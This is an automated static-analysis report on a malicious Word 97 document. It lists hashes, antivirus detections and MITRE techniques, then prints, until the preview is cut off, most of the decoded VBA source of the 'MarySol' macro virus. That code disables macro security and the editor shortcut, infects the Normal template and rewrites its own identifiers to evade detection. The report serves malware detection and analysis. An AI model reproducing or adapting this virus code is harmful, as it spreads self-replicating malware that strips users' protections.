Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 46aa9209dd250f98…

MALICIOUS

Office (OLE)

43.5 KB Created: 1999-12-13 14:17:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 077f7b5cdbb24f7d1bf025669957d66f SHA-1: 47d69210881d9c6f576c9f2c48311274c5020ef7 SHA-256: 46aa9209dd250f9853b115e53a70bbe1fbfd5172b37a48526833faa366ed596d
Risk score: 180

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic; T1566.001 Phishing: Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros, specifically a Document_Open macro. On newer Word versions the macro attempts to lower macro security by writing the value Level under HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security (via System.PrivateProfileString) and deleting the "Security..." item from the Macro menu; on older versions it clears Options.VirusProtection instead. It also disables the Alt+F11 key binding and hides the Visual Basic Editor, then copies its own code between the active document and the Normal template and rewrites its identifier names with random strings — the behaviour of a self-replicating, polymorphic macro virus. The 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Mary-2' ClamAV detections strongly suggest malicious intent; no payload download or execution is visible in the extracted preview, so any such capability would have to lie in the truncated portion.

Heuristics (3)

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 20286 bytes
SHA-256: 3f766892a2dd860bb523b5475bc32f5c7919df3fcd4f825f5ec4d355b33bb34a
Detection
ClamAV: Doc.Trojan.Mary-2
Obfuscation or payload: unlikely (automated assessment; note that the preview below builds the string "Private Sub Document_Open()" from Chr() codes and randomizes its own identifier names, so a reviewer should treat the macro as lightly obfuscated)
Preview script
First 1,000 lines of the extracted script
' Module attribute header as written out by the VBA exporter (olevba
' extract_macros). These Attribute lines are module metadata, not executed
' statements; VB_Name identifies the ThisDocument module, and the "1Normal"
' prefix in VB_Base together with VB_TemplateDerived = True suggests the
' module was derived from the Normal template — TODO confirm against the OLE.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Author-supplied banner comments (kept verbatim from the extracted source).
'Word97.MarySol v1.2
'(c) 1999 cry0tek

Private Sub Document_Open()
'MarySol
On Error Resume Next
Dim varray(1 To 14) As String
Dim Wt4Kg7Bj8Mu2Zx1Ih6Xt1 As Long: Dim Kn7Qv0Rf8Wv1Uk3Ie6Aj4La6 As Long: Dim Xq4Aq6Yb2Zg1Xt7Ar6Lc7Hq5Ay5 As Long: Dim Ia4Dr7Jb2Bm7Pz6Zf0In2Jk9Me6 As Long
If Left(Application.Version, 1) > 9 Then
 CommandBars("Macro").Controls("Security...").Delete
 System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
 Options.VirusProtection = (1 - 1)
End If
FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
Options.SaveNormalPrompt = (1 - 1): Options.ConfirmConversions = (1 - 1): Application.EnableCancelKey = (1 - 1)
Application.ScreenUpdating = (1 - 1): Application.ShowVisualBasicEditor = (1 - 1)
If System.OperatingSystem = "Windows" And System.LanguageDesignation = "English (United States)" Then
 Xt0Je2Bv5Gg6Rm9Ix0Ot4Yr9Rg6Aq1 = GetAttr(NormalTemplate.FullName)
 If Xt0Je2Bv5Gg6Rm9Ix0Ot4Yr9Rg6Aq1 = vbReadOnly Then GoTo Yd3Ol3Hn6Sg8Kd1Lp8Ti1Kq8Lw7
 If Xt0Je2Bv5Gg6Rm9Ix0Ot4Yr9Rg6Aq1 = vbReadOnly + vbArchive Then GoTo Yd3Ol3Hn6Sg8Kd1Lp8Ti1Kq8Lw7
End If
Set Br6Jk8Hk1Nv4Ea8Rs4Tg8 = ActiveDocument.VBProject.VBComponents.Item(1).Codemodule
Set Qj6Zf5Dl7Zr5Bv5Vi5Jt0Mx3Ch7Xh3 = NormalTemplate.VBProject.VBComponents.Item(1).Codemodule
If Br6Jk8Hk1Nv4Ea8Rs4Tg8.Lines(5, 1) <> "'MarySol" Then
 Br6Jk8Hk1Nv4Ea8Rs4Tg8.DeleteLines 1, _
 Br6Jk8Hk1Nv4Ea8Rs4Tg8.CountOfLines
 Br6Jk8Hk1Nv4Ea8Rs4Tg8.InsertLines 1, Qj6Zf5Dl7Zr5Bv5Vi5Jt0Mx3Ch7Xh3.Lines _
 (1, Qj6Zf5Dl7Zr5Bv5Vi5Jt0Mx3Ch7Xh3.CountOfLines)
 Br6Jk8Hk1Nv4Ea8Rs4Tg8.ReplaceLine 4, Chr(80) + Chr(114) + Chr(105) + Chr(118) + Chr(97) + Chr(116) + Chr(101) + Chr(32) + _
 Chr(83) + Chr(117) + Chr(98) + Chr(32) + Chr(68) + Chr(111) + Chr(99) + Chr(117) + Chr(109) + Chr(101) + _
 Chr(110) + Chr(116) + Chr(95) + Chr(79) + Chr(112) + Chr(101) + Chr(110) + Chr(40) + Chr(41)
End If
If Qj6Zf5Dl7Zr5Bv5Vi5Jt0Mx3Ch7Xh3.Lines(5, 1) <> "'MarySol" Then
 Randomize
 varray(1) = "Xt0Je2Bv5Gg6Rm9Ix0Ot4Yr9Rg6Aq1": varray(2) = "Br6Jk8Hk1Nv4Ea8Rs4Tg8": varray(3) = "Qj6Zf5Dl7Zr5Bv5Vi5Jt0Mx3Ch7Xh3": varray(4) = "Wt4Kg7Bj8Mu2Zx1Ih6Xt1": varray(5) = "Kn7Qv0Rf8Wv1Uk3Ie6Aj4La6": varray(6) = "Xq4Aq6Yb2Zg1Xt7Ar6Lc7Hq5Ay5": varray(7) = "Ia4Dr7Jb2Bm7Pz6Zf0In2Jk9Me6"
 varray(8) = "Yd3Ol3Hn6Sg8Kd1Lp8Ti1Kq8Lw7": varray(9) = "Fm8": varray(10) = "Kr4Tl5Yk8Fe9": varray(11) = "Lh7Tu1Ki7Qc1": varray(12) = "Ir5Qc8Lq0Oc0Fv9Dc2St9Fi1Iq7": varray(13) = "Wv2Ln0Ai5Uz9Nv1Bd8": varray(14) = "Ku0Yj6"
 For i = 1 To 14
  For j = 1 To Int((10 * Rnd) + 1)
   PolyVal = PolyVal + Chr(65 + Int(Rnd * 26)) & Chr(122 - Int(Rnd * 26)) & Chr(48 + Int(Rnd * 10))
  Next j
  With Br6Jk8Hk1Nv4Ea8Rs4Tg8
   Wt4Kg7Bj8Mu2Zx1Ih6Xt1 = 1: Kn7Qv0Rf8Wv1Uk3Ie6Aj4La6 = 1: Xq4Aq6Yb2Zg1Xt7Ar6Lc7Hq5Ay5 = .CountOfLines: Ia4Dr7Jb2Bm7Pz6Zf0In2Jk9Me6 = Len(.Lines(.CountOfLines, 1))
   Do While .Find(varray(i), Wt4Kg7Bj8Mu2Zx1Ih6Xt1, Kn7Qv0Rf8Wv1Uk3Ie6Aj4La6, Xq4Aq6Yb2Zg1Xt7Ar6Lc7Hq5Ay5, Ia4Dr7Jb2Bm7Pz6Zf0In2Jk9Me6, True)
    strVal = .Lines(Wt4Kg7Bj8Mu2Zx1Ih6Xt1, 1)
    strVal = Left(strVal, Kn7Qv0Rf8Wv1Uk3Ie6Aj4La6 - 1) & PolyVal & Mid(strVal, Ia4Dr7Jb2Bm7Pz6Zf0In2Jk9Me6)
    .ReplaceLine Wt4Kg7Bj8Mu2Zx1Ih6Xt1, strVal
    Wt4Kg7Bj8Mu2Zx1Ih6Xt1 = Xq4Aq6Yb2Zg1Xt7Ar6Lc7Hq5Ay5 + 1: Kn7Qv0Rf8Wv1Uk3Ie6Aj4La6 = 1
    Xq4Aq6Yb2Zg1Xt7Ar6Lc7Hq5Ay5 = .CountOfLines: Ia4Dr7Jb2Bm7Pz6Zf0In2Jk9Me6 = Len(.Lines(.CountOfLines, 1))
   Loop
  End With
  PolyVal = ""
 Next i
 Qj6Zf5Dl7Zr5Bv5Vi5Jt0Mx3Ch7Xh3.DeleteLines 1, _
 Qj6Zf5Dl7Zr5Bv5Vi5Jt0Mx3Ch7Xh3.CountOfLines
 Qj6Zf5Dl7Zr5Bv5Vi5Jt0Mx3Ch7Xh3.InsertLines 1, Br6Jk8Hk1Nv4Ea8Rs4Tg8.Lines _
 (1, Br6Jk8Hk1Nv4Ea8Rs4Tg8.CountOfLines)
 Qj6Zf5Dl7Zr5Bv5Vi5Jt0Mx3Ch7Xh3.ReplaceLine 4, Chr(80) + Chr(114) + Chr(105) + Chr(118) + Chr(97) + Chr(116) + Chr(101) + Chr(32) + _
 Chr
... (truncated)